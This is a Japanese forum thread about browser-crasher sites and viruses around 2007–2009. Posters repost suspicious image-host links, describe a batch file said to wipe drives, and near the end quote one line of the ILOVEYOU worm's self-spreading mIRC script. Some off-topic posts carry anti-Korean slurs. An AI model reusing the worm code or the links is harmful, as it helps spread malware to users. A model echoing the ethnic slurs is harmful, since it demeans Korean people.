（〜略〜）
> 5.その後、バッチファイルをダウンロードを促される
> ttp://up2.viploader.net/pic2/src/viploaderf120001.jpg
> いきなりスタートアップフォルダ指定ですか
>
> ちなみにバッチファイルは実行するとHDDが全部まっさらになる
------------------------------
http://pc11.2ch.net/test/read.cgi/pcqa/1192793132/489
> 489 ：|A`)ヅウ ◆.vDUUxqvlE ：2007/11/21(水) 09:31:54 ID:aIn73kcY
（〜略〜）
> 2　アミララ関係のURLが開き、その後、別ページに飛ばされ延々読み込みが続きます
> 　　表示窓をクリックすると小窓が多数開き叫び声が再生され
> 　　メーラーが起動させられたので強制的に閉じました
> 　　そこまでウイルス反応なしですが
> 　　PC有害

>>770-771
超thx

h　ttp　://up2.viploader.net/pic/src/viploader582987.jpg


これウィルスらしいだがそうなん？
俺の環境（jane）だとブサイクが表示されただけなんだが。。

どれどれ

ttp://up2.viploader.net/pic/src/viploader582987.jpg

なにかおかしいと思ったら再起動するんじゃなくてスタートアップを確認するべきだな

質問です。
今さっき、「gigigi.net」でググったら、レディース(女の暴走族)の画像が
バンとで出てきました。
５秒後位に画面閉じたんですが、大丈夫ですか？

　　　　７７７　
合体

>>20で紹介されてるwikiの左側にある
「有用と思われる書き込み」ってとこクリックすると、
ＮＯＤが「BAT/DeltreeY.AN トロイの木馬」ってのを検出＆隔離して
接続切断するんだけど・・・

wikiにウイルスがあるってこと？？

age

s

このスレで画像はりつけんなｗｗｗ怖くてふめねーよ

このパソコンアンチウイルス入ってないけど問題ない

┌─────┐┌─────┐┌─────┐┌─────┐┌─────┐
..|　　 全力　　　|....|　　　レイ　 　 |....|.　　　プ　　　...|....| 　 　 だ！. 　 |....|　　桐生一　　|
└∩───∩┘└∩───∩┘└∩───∩┘└∩───∩┘└∩───∩┘
　 ヽ( `･ω･.)ﾉ　 　　ヽ(`･ω･´)ﾉ　　　 ヽ(`･ω･´)ﾉ　　　 ヽ(`･ω･´)ﾉ　　　 ヽ(･ω･´ )ﾉ

セキュ板でAmilalaも知らなかったやつがいる痛いスレ

【国内】７１００万円の脱税で猶予判決、朝鮮総連の傘下団体の職員ら・・・京都地裁［08/27］
http://news24.2ch.net/test/read.cgi/news4plus/1220118459/

2009年初頭はこうゆうウイルス出回ってんの？

あ？どう？

「毎日新聞とってください」と勧誘員がきた
「うちは成りすまし朝鮮人じゃない」と言って追っ払った
反日変態新聞なんか読むのは朝鮮人と大差ない

http://image.infoseek.rakuten.co.jp/content/ad/d6595/728x90_090728_03.jpg
NDSのヤツを連想する

Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

?

このスレ懐かしいな